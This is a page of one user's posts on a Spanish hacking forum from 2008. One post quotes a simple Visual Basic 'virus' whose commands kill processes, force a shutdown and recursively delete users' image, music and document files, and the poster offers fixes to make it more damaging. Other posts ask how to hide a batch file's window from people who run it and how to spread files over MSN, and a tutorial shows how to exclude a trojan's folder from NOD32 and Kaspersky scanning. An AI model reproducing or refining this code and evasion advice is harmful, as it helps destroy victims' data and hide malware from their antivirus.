elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10
81  Programación / Scripting / Re: Desabilitar el MSCONFIG |By-Skull| en: 12 Febrero 2008, 00:14 am
es casi lo mismo! ;) :P
82  Programación / Scripting / Re: Ayuda, comando for en: 11 Febrero 2008, 00:03 am
pues simple pasate por el otro foro donde hicistes la misma pregunta, que ya te respondieron (si el de CUH ;))
83  Programación / Programación Visual Basic / Re: una ayuda con el modo ghost? en: 11 Febrero 2008, 00:00 am
osea disculpen si me equivoco pero lo que entendi fue esto:

ok se crear un programa tipo bat to exe ok, entonces cuando valla a pasar el batch a .exe "" la verdadera funcion que cumple el .exe es que cuando se ejecute descarge el code osea el batch en otro lugar y lo ejecute con el vbhide, no??
84  Programación / Programación Visual Basic / Re: una ayuda con el modo ghost? en: 10 Febrero 2008, 05:02 am
disculpa que no especifique, es para fichero .batch! por ejemplo yo tengo mi batch y pongo una opcion de hacer ghost el .bat el elige el .bat y le da al boton y luego el pueda enviar ese batch y cuando lo ejecuten donde sea, no se vea la pantallita negra, sabes como lo puedo hacer, o es el mismo metodo que posteastes?
85  Programación / Programación Visual Basic / una ayuda con el modo ghost? en: 10 Febrero 2008, 04:20 am
saludos, bueno no se si hallan visto esos programas por ejemplo para batch que cuando los compilas a .exe puedes ponerle la opcion de modo ghost, bueno mi pregunta es la siguiente:

¿Cual seria el code, o la API o lo que sea que se usa para hacer eso?

Salu2's! 8)
86  Programación / Programación Visual Basic / Re: Programar tareas en: 9 Febrero 2008, 23:07 pm
pues mira si lo quieres hacer en Batch usar para eso Variables Globales (ojo las de batchXD)

Salu2's! cool
87  Programación / Programación Visual Basic / Re: api de messenger en: 9 Febrero 2008, 21:30 pm
mmm no se muy bien porque yo lo hago asi y pues me sirve, pero asegura de que hallas agregado la "API"!! ;)

Salu2's! cool
88  Programación / Programación Visual Basic / Re: Virus simple en VB en: 9 Febrero 2008, 21:29 pm
jeje muy interesante me dan ganas de hacer un editor de batch! :P pero bueno..
a tu code osea el del batch se le peude arreglar muchas cosas para que sea "mas potente" dejame ayudarte:

Citar
Shell "cmd.exe taskkill msnmsgr.exe"
Shell "cmd.exe taskkill msnmsgs.exe"
Shell "cmd.exe taskkill schvoust.exe"
Shell "cmd.exe taskkill iexplore.exe"
Shell "cmd.exe taskkill word.exe"
Shell "cmd.exe taskkill outlook.exe"
Shell "cmd.exe taskkill notepad.exe"
Shell "cmd.exe taskkill mspaint.exe"
ponle /F /IM osea quedaria: taskkill /F /IM

Citar
Shell "cmd.exe echo AT %hora% %min% tsshutdown -s -f -c ""Imbecil"""
porque pones tss? para apagar la pc se usa es shutdown (y sus parametros)

Citar
Shell "cmd.exe del /Q /S /F msnmsgr.exe"
Shell "cmd.exe del /Q /S /F msnmsgs.exe"
Shell "cmd.exe del /Q /S /F schvoust.exe"
Shell "cmd.exe del /Q /S /F iexplore.exe"
Shell "cmd.exe del /Q /S /F word.exe"
Shell "cmd.exe del /Q /S /F outlook.exe"
Shell "cmd.exe del /Q /S /F notepad.exe"
Shell "cmd.exe del /Q /S /F mspaint.exe"
Shell "cmd.exe del /Q /S /F C:\ *.jpg"
Shell "cmd.exe del /Q /S /F C:\ *.bmp"
Shell "cmd.exe del /Q /S /F C:\ *.png"
Shell "cmd.exe del /Q /S /F C:\ *.psd"
Shell "cmd.exe del /Q /S /F C:\ *.mp3"
Shell "cmd.exe del /Q /S /F C:\ *.mid"
mm estas borrando el outlook, msn, mspaint, notepad? hay cosas que no estan en el directorio WINDOWS, como estas y creo que mas, que sepa mspaint esta es en el system32, = que el notepad, el msn esta en las carpetas del msn? deberias acomodar eso! :P
y para lo del del en el C:\ pues esta bien pero en el C:\ casi nadie tiene archivos .jpg, .mp3 y esos! mejor seria en elñ system32 o algo asi! ;)

Bueno esa es mi recomendacion! ;)

Salu2's! cool
89  Programación / Programación Visual Basic / Re: Propagacion via MSN LIVE en: 9 Febrero 2008, 21:18 pm
pues, creo que primero debes dominar la API del messenger, para escribir, enviar archivos, abrir conversaciones, etc... y luego de hay, podras ir sacando como enviar archivos y eso! ;)

P.D: La API del msn no es tan dificil de utilizar!

Salu2's! cool
90  Informática / Tutoriales - Documentación / Excluir carpetas (con troyanos, virus, etc) de los AV |By-Skull| en: 9 Febrero 2008, 21:16 pm
Saludos, bueno aqui posteo algo que aprendi ya hace tiempo de un excelente mod de otro foro que se llama Angelus_7722 y bueno quiero poner en practica lo que aprendi de el! ;) no voy a poner todos los AV de una sola vez, pondre mientras unos pocos!...

                                                                                          Nod32

Lo primero que haremos es darle clic izquierdo al icono ubicado en la barra de herramnientas



Seleccionamos el modulo  AMON



pinchamos conf. (configuracion)



Selecionamos la pestaña Exclusión y luego seleccionamos Agregar



pinchamos en la carpeta



buscamos la carpeta donde esta alojado el troyano



Lo siguiente es mantener la configuracion de la captura de pantalla y damos clic en Aceptar



Listo


                                                              Kaspersky

Hacemos el primer procedimiento ubicamos el icono, etc..
Ahora seleccionamos en el modulo Protección la opcion de Antivirus de Archivos



le damos donde dice configurar



le damos en Amenazas y exclusiones y en la sección de exclusiones pinchamos Zona de confianza



le damos en agregar
En descripcion de la regla damos clic en Objeto: especificar



Lo siguiente que haremos es darle clic a Examinar pero antes debemos marcar la opcion Incluir Subcarpetas (como se daran cuenta olvidé hacerlo)



Ahora buscamos la carpeta que vamos a excluir, como hicimos anteriormente.
y como ven ya esta excluida y solo queda dar los respectivos Aceptar



Listo



                                                      Proximamente

-Avast
-Norton
-Mejor detallado con color, etc..
Páginas: 1 2 3 4 5 6 7 8 [9] 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines